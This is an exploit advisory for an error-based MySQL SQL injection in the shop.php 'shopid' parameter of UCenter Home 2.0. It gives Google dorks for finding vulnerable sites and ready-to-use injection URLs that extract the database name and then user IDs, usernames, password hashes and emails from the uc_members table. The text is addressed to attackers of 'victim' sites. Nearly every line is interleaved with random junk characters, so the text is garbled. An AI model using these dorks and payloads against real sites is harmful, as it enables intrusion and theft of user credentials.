. P+ l3 [0 C. P2 B. @
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__
1 q+ \- p8 A* J \+ m5 H& V0 c6 N! w6 ~; Z# P7 l+ }
" M' y% a2 _% r0 d
5 g* L/ G( ]7 }9 T+ p A1 ]*/ Author : KnocKout , [/ G& _" d) j4 [0 J7 V+ {! `
* ^! R7 [9 J- n6 y! @7 F$ T- H& l2 ~
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
r# X: A, Q! C3 L
; @4 o8 C: @* ?. k*/ Contact: knockoutr@msn.com / z% v: e' U- A8 `
! q |( S& ]: {" E5 x*/ Cyber-Warrior.org/CWKnocKout 9 _; D/ X4 u& i# }, Y
& P- d1 O4 }* g7 i& Q- P
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== 4 C9 v* L- a9 r3 t* i2 C
% V4 P4 W Z3 G$ ]
Script : UCenter Home
/ n" @1 ^* K% w& \/ N" M( h: B8 t# l2 p7 d* B1 ~& X% _- p
Version : 2.0
6 |+ y1 ~( G" `7 h5 U+ v4 A; V$ _5 [# c% v
Script HomePage : http://u.discuz.net/
6 R+ O; W+ t, f, l: @" |/ }$ q; _; a3 w: Y
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
/ s0 d+ ^" y/ @+ N3 j3 f* r# d t# | A- `$ S6 D
Dork : Powered by UCenter inurl:shop.php?ac=view
& j* l! {/ L& d4 H& R; S
* R H3 \! i9 j! z, GDork 2 : inurl:shop.php?ac=view&shopid= 9 x" U. i9 C, l0 b
% j7 e0 l+ H* h1 p: U
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
1 O8 H: v1 j _- b2 b1 _* R& G% \+ S3 u+ Q
Vuln file : Shop.php . ?+ o! F$ N7 T
3 v6 ?7 l3 \( _. C: t& m1 X( f4 bvalue's : (?)ac=view&shopid= 9 r( ^$ S; _9 l% \' X4 T* m" h
8 \: O; [0 J8 v" f; V2 p
Vulnerable Style : SQL Injection (MySQL Error Based)
v7 F2 x; I6 Z
$ X; `' {& Q* R7 i c7 o8 _Need Metarials : Hex Conversion 9 g8 G: x2 }2 a" d0 V4 }+ @
+ V+ L5 }- _! G8 A1 D; Q
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== 6 J* B0 _) ~* O5 c
$ \! [! [3 L. V! iYour Need victim Database name.
; z( L: S' [* S6 P* y+ j" ~: D9 V8 r6 H2 S( U
for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 & [- n# A+ M: b( o$ D
6 G2 y/ I9 v/ @
..
0 L. _) \9 i8 ~9 _$ g+ e. e9 |! R# N: Q. Q' k+ k/ p
DB : Okey. e- X6 I8 n$ N/ h- @- U L7 \
; J% A4 Z% }8 w% b% O$ |
your edit DB `[TARGET DB NAME]` : V. ?/ R+ D& y
5 p& \/ C, N. ?* q* L* [) ?0 @+ D, r4 eExample : 'hiwir1_ucenter' , O. l, Q4 l3 \! F) k
: @; E' p4 M! X+ @- l" U8 m6 m* v
Edit : Okey. 0 _- V, S8 m2 m3 s3 N3 _8 [7 [
- ~* q: J8 N9 t* ~7 w: c% }
Your use Hex conversion. And edit Your SQL Injection Exploit..
- J ?2 G1 t( m% ?4 R, K x$ C1 d2 P) a! B& \
1 _3 l3 Y( [3 o" ]
' ~; q1 [9 O; O
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
* \% B) a" B" n! [ |